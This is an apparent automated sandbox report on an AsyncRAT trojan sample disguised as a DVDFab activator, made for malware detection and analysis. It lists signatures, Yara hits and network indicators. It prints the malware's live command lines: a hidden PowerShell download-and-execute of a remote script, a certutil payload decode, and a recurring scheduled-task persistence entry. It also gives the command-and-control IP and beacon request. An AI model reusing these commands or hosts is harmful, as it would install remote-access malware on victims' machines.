Play interactive tour

Edit tour

Analysis Report xuXIetZvv6.exe

Overview

General Information

Sample Name:	xuXIetZvv6.exe
Analysis ID:	391271
MD5:	200cb4b34ea0e61fe8454731bf7a107a
SHA1:	a6121f8f7d8600c2278e90d5ae622c9b2d3b410b
SHA256:	3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3
Tags:	exeVjw0rm
Infos:
Most interesting Screenshot:

Detection

AsyncRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AsyncRAT

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Contains functionality to detect sleep reduction / modifications

Drops PE files to the startup folder

Drops VBS files to the startup folder

Dynamically executes javascript script code

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample or dropped binary is a compiled AutoHotkey binary

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Conhost Parent Process Executions

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Uses the system / local time for branch decision (may execute only at specific dates)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

xuXIetZvv6.exe (PID: 6348 cmdline: 'C:\Users\user\Desktop\xuXIetZvv6.exe' MD5: 200CB4B34EA0E61FE8454731BF7A107A)

cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cacls.exe (PID: 6648 cmdline: 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system' MD5: 30C3BBEA1544A7E3EC2103931AEF98FF)

certutil.exe (PID: 6712 cmdline: certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: EB199893441CED4BBBCB547FE411CF2D)

attrib.exe (PID: 6912 cmdline: attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

Ne - Copy.exe (PID: 6568 cmdline: 'C:\Users\user\AppData\Roaming\Ne - Copy.exe' MD5: A4A1FA7769DF7C47A6D69FB66AA1EB30)

conhost.exe (PID: 6720 cmdline: C:\ProgramData/conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)

schtasks.exe (PID: 6876 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wscript.exe (PID: 6704 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 6888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))' MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

OpenWith.exe (PID: 6748 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)

conhost.exe (PID: 6252 cmdline: C:\ProgramData\conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)

schtasks.exe (PID: 3020 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

OpenWith.exe (PID: 988 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)

conhost.exe (PID: 5440 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)

schtasks.exe (PID: 5364 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 6652 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)

schtasks.exe (PID: 6948 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 1260 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
xuXIetZvv6.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp	SUSP_certificate_payload	Detects payloads that pretend to be certificates	Didier Stevens, Florian Roth	0x0:$re1: -----BEGIN CERTIFICATE-----
C:\Users\user\AppData\Roaming\winlogon.vbs	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x469:$a1: Net.WebClient).DowNloAdSTRiNg 0x497:$a2: gist.githubusercontent.com
C:\Users\user\AppData\Roaming\winlogon.vbs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x8da:$a1: certutil -decode
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x469:$a1: Net.WebClient).DowNloAdSTRiNg 0x497:$a2: gist.githubusercontent.com
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x10d1:$a1: Net.WebClient).DowNloAdSTRiNg 0x1731:$a1: Net.WebClient).DowNloAdSTRiNg 0x10ff:$a2: gist.githubusercontent.com 0x175f:$a2: gist.githubusercontent.com
00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000000.00000002.234484249.00000000007D8000.00000002.00020000.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000007.00000002.234040643.000001B999F40000.00000004.00000020.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x22ba:$a2: certutil -decode 0x2402:$a2: certutil -decode 0x3500:$a2: certutil -decode
0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000000.00000002.236345549.0000000002C31000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xd2ea:$a1: certutil -decode 0xe13a:$a1: certutil -decode
0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: certutil.exe PID: 6712	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x4a096:$a2: certutil -decode 0x4a139:$a2: certutil -decode 0x4a3da:$a2: certutil -decode
Process Memory Space: powershell.exe PID: 6920	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: xuXIetZvv6.exe PID: 6348	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: wscript.exe PID: 6704	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.xuXIetZvv6.exe.8285a2.2.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
14.2.powershell.exe.13385685750.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.xuXIetZvv6.exe.8285a2.2.raw.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
14.2.powershell.exe.1339cff0000.6.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.xuXIetZvv6.exe.8285a2.2.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
14.2.powershell.exe.1339cff0000.6.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.xuXIetZvv6.exe.6e0000.0.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
14.2.powershell.exe.13385685750.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.xuXIetZvv6.exe.6e8636.1.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0.0.xuXIetZvv6.exe.8285a2.2.raw.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0.0.xuXIetZvv6.exe.6e8636.1.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0.2.xuXIetZvv6.exe.6e0000.0.unpack	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6888, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs

Sigma detected: Conhost Parent Process Executions

Show sources

Source: Process started

Author: omkar72: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\ProgramData/conhost.exe, ParentImage: C:\ProgramData\conhost.exe, ParentProcessId: 6720, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, ProcessId: 6876

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Metadefender: Detection: 26%			Perma Link
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Show sources

Source: xuXIetZvv6.exe	Virustotal: Detection: 54%	Perma Link
Source: xuXIetZvv6.exe	Metadefender: Detection: 23%	Perma Link
Source: xuXIetZvv6.exe	ReversingLabs: Detection: 55%

Machine Learning detection for sample

Show sources

Source: xuXIetZvv6.exe

Joe Sandbox ML: detected

Source: xuXIetZvv6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0

Source: xuXIetZvv6.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdb source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
Source:	Binary string: C:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, Ne - Copy.exe, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
Source:	Binary string: EC:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdb source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB002E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C32E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,

Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 46.1.54.174:87 -> 192.168.2.5:49715

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 77 -> 49709

Source: global traffic

TCP traffic: 192.168.2.5:49709 -> 46.1.54.174:77

Source: Joe Sandbox View

IP Address: 46.1.54.174 46.1.54.174

Source: Joe Sandbox View

ASN Name: MILLENICOM-ASDE MILLENICOM-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174
Source: unknown	TCP traffic detected without corresponding DNS query: 46.1.54.174

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014007D8A0 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,

Source: unknown

DNS traffic detected: queries for: www.uplooder.net

Source: unknown

HTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 46.1.54.174:77Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, conhost.exe, 00000011.00000002.494441942.0000027803EF3000.00000004.00000001.sdmp	String found in binary or memory: http://46.1.54.174/
Source: conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://46.1.54.174/t
Source: conhost.exe, 00000011.00000003.246613450.0000027803CEA000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.244935879.00000278037FB000.00000004.00000001.sdmp	String found in binary or memory: http://46.1.54.174:77/
Source: conhost.exe, 00000011.00000002.494826306.0000027804085000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.491494117.00000278037F5000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.494023948.0000027803CE8000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.494003575.0000027803CE0000.00000004.00000001.sdmp	String found in binary or memory: http://46.1.54.174:77/Vre
Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp	String found in binary or memory: http://46.1.54.174:77/VreY
Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp	String found in binary or memory: http://46.1.54.174:77/Vre_Num
Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp	String found in binary or memory: http://46.1.54.174:77/Vree
Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp	String found in binary or memory: http://46.1.54.174:77/Vreg
Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp	String found in binary or memory: http://46.1.54.174:77/Vrex
Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp	String found in binary or memory: http://46.1.54.174:77/Vrey6
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsi
